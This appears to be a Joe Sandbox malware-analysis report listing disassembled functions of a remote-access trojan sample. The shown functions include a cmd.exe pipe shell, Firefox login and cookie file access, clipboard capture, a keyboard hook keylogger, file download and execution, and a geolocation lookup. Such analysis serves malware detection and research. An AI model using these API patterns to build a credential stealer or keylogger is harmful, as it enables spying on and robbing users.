Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: File$Find$DeleteDirectoryRemove$AttributesCloseDriveEventExecuteFirstLocalLogicalNextShellStringsTime
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $T/F$Unable to delete: $Unable to rename file!$open
API String ID: 3077191444-2050282093
Opcode ID: be72c0cea12ebda5ccd09e67db53343e383971f16eef94204e7e81f1bd3ddd56
Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
Opcode Fuzzy Hash: be72c0cea12ebda5ccd09e67db53343e383971f16eef94204e7e81f1bd3ddd56
Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B

Function 0040567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056C6
__Init_thread_footer.LIBCMT ref: 00405703
CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
TerminateProcess.KERNEL32(00000000), ref: 004059F7
CloseHandle.KERNEL32 ref: 00405A03
CloseHandle.KERNEL32 ref: 00405A0B
CloseHandle.KERNEL32 ref: 00405A1D
CloseHandle.KERNEL32 ref: 00405A25

Strings

SystemDrive, xrefs: 00405741
cmd.exe, xrefs: 0040572D

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexit
String ID: SystemDrive$cmd.exe
API String ID: 618029711-3633465311
Opcode ID: db8eee06f3bbda7447ed97e7c303faadcd31ae3810963c73e2bf5aa46986682c
Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
Opcode Fuzzy Hash: db8eee06f3bbda7447ed97e7c303faadcd31ae3810963c73e2bf5aa46986682c
Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E

Function 0040AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
FindClose.KERNEL32(00000000), ref: 0040AB0A
FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
FindClose.KERNEL32(00000000), ref: 0040AC53

Strings

[Firefox StoredLogins not found], xrefs: 0040AB15
[Firefox StoredLogins Cleared!], xrefs: 0040AC40
UserProfile, xrefs: 0040AAA1
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040AA93
\logins.json, xrefs: 0040AB75
\key3.db, xrefs: 0040ABB7

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: 4f878cdabca864fd8e4def977261fe52710bfc74ce83ff2ab3961b6b62e1e906
Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
Opcode Fuzzy Hash: 4f878cdabca864fd8e4def977261fe52710bfc74ce83ff2ab3961b6b62e1e906
Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A

Function 0040AC78 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
FindClose.KERNEL32(00000000), ref: 0040AD0A
FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
FindClose.KERNEL32(00000000), ref: 0040ADF0
FindClose.KERNEL32(00000000), ref: 0040AE11

Strings

[Firefox cookies found, cleared!], xrefs: 0040AE20
UserProfile, xrefs: 0040ACA1
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040AC93
[Firefox Cookies not found], xrefs: 0040AD15, 0040ADDD
\cookies.sqlite, xrefs: 0040AD6D

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 52877667f45bbdd0b760bf8b0047ed44bccf1c1249d05f9fca9df81a73d20b2f
Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
Opcode Fuzzy Hash: 52877667f45bbdd0b760bf8b0047ed44bccf1c1249d05f9fca9df81a73d20b2f
Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E

Function 00414EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00414EC2
EmptyClipboard.USER32 ref: 00414ED0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
GlobalLock.KERNEL32(00000000), ref: 00414EF9
GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
CloseClipboard.USER32 ref: 00414F55
OpenClipboard.USER32 ref: 00414F5C
GetClipboardData.USER32(0000000D), ref: 00414F6C
GlobalLock.KERNEL32(00000000), ref: 00414F75
GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
CloseClipboard.USER32 ref: 00414F84

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmpty
String ID:
API String ID: 2339235153-0
Opcode ID: 798685ff07400f3cc401de33015aba2ed73e94d92061d2a6da5efc927610f1a7
Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
Opcode Fuzzy Hash: 798685ff07400f3cc401de33015aba2ed73e94d92061d2a6da5efc927610f1a7
Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A

Function 004175E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON

Download Yara Rule

Strings

5, xrefs: 004177C1
0, xrefs: 0041760B
7, xrefs: 004177E2
3, xrefs: 0041770C
2, xrefs: 004176AC
6, xrefs: 004177CB
1, xrefs: 0041764D
4, xrefs: 00417770

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: a8d0df93e5f8a066e7b011b6a1d3a7de81d979cc05f74ce077101d6e7286cc23
Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
Opcode Fuzzy Hash: a8d0df93e5f8a066e7b011b6a1d3a7de81d979cc05f74ce077101d6e7286cc23
Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6

Function 004186FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
GetLastError.KERNEL32 ref: 00418771
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 7dc84aa95a530a12f7e1af1ae2f547e3e1bde7312f3904c2f4f2d116fd88398b
Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
Opcode Fuzzy Hash: 7dc84aa95a530a12f7e1af1ae2f547e3e1bde7312f3904c2f4f2d116fd88398b
Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A

Function 0040B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
FindClose.KERNEL32(00000000), ref: 0040B3BE
FindClose.KERNEL32(00000000), ref: 0040B3E9

Strings

\Mozilla\Firefox\Profiles\, xrefs: 0040B2AF
AppData, xrefs: 0040B299
\cookies.sqlite, xrefs: 0040B34A

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 7eade7ae559396b91c788499e28af31718b33c23fa40b722cb0a54370978db76
Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
Opcode Fuzzy Hash: 7eade7ae559396b91c788499e28af31718b33c23fa40b722cb0a54370978db76
Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D

Function 0041A01B Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125

Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB

GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19

Function 00410763 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207

SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
SetLastError.KERNEL32(0000000E), ref: 0041082E

Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718

GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
HeapAlloc.KERNEL32(00000000), ref: 0041087C
SetLastError.KERNEL32(0000045A), ref: 0041098F

Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53

Strings

$.F, xrefs: 00410767

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID: $.F
API String ID: 3950776272-1421728423
Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9

Function 00409340 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
GetLastError.KERNEL32 ref: 00409375

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
TranslateMessage.USER32(?), ref: 004093D2
DispatchMessageA.USER32(?), ref: 004093DD

Strings

Keylogger initialization failure: error , xrefs: 00409389

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 4c2ffb5bfab47b4d6a89f4109e67b78fa61f5e07fcbe4fa4259a912f8e120c6b
Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
Opcode Fuzzy Hash: 4c2ffb5bfab47b4d6a89f4109e67b78fa61f5e07fcbe4fa4259a912f8e120c6b
Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A

Function 004128E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
GetProcAddress.KERNEL32(00000000), ref: 00412CC1

Strings

Shlwapi.dll, xrefs: 00412CB5
SHDeleteKeyW, xrefs: 00412CB0

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProc
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 1563625733-314212984
Opcode ID: 1ec30fb3ba388965c3b7a9bbad0bfcd44499e4205dedceef393d860d1584ff54
Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
Opcode Fuzzy Hash: 1ec30fb3ba388965c3b7a9bbad0bfcd44499e4205dedceef393d860d1584ff54
Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A

Function 0040E2E7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
Part of subcall function 00419F23: IsWow64Process.KERNEL32(00000000,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F3B

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
CloseHandle.KERNEL32(00000000), ref: 0040E4EF

Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
Part of subcall function 00419F51: IsWow64Process.KERNEL32(00000000,?,?,?,00000001), ref: 00419F71

Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0

Strings

XAF, xrefs: 0040E346

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Process$Process32$NextOpenWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID: XAF
API String ID: 44284711-3946003707
Opcode ID: d8d45d1d9df1b72d477be03f2b11192304299260eec88e848f1da2b4f560b105
Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
Opcode Fuzzy Hash: d8d45d1d9df1b72d477be03f2b11192304299260eec88e848f1da2b4f560b105
Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A

Function 0040E18D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00411F34: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D

Sleep.KERNEL32(00000BB8), ref: 0040E243
ExitProcess.KERNEL32 ref: 0040E2B4

Strings

h5S, xrefs: 0040E19E, 0040E1E6, 0040E255
pth_unenc, xrefs: 0040E1A3, 0040E1EC, 0040E25B
override, xrefs: 0040E1B2
3.8.0 Pro, xrefs: 0040E21E, 0040E28D

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 3.8.0 Pro$h5S$override$pth_unenc
API String ID: 2281282204-476828247
Opcode ID: 7885c52482673bc6b5baf0f2f22fafa2bf54de89e443a5fbd8526dcc006b68a3
Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
Opcode Fuzzy Hash: 7885c52482673bc6b5baf0f2f22fafa2bf54de89e443a5fbd8526dcc006b68a3
Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF

Function 0041936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
InternetCloseHandle.WININET(00000000), ref: 00419407
InternetCloseHandle.WININET(00000000), ref: 0041940A

Strings

http://geoplugin.net/json.gp, xrefs: 004193A2

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
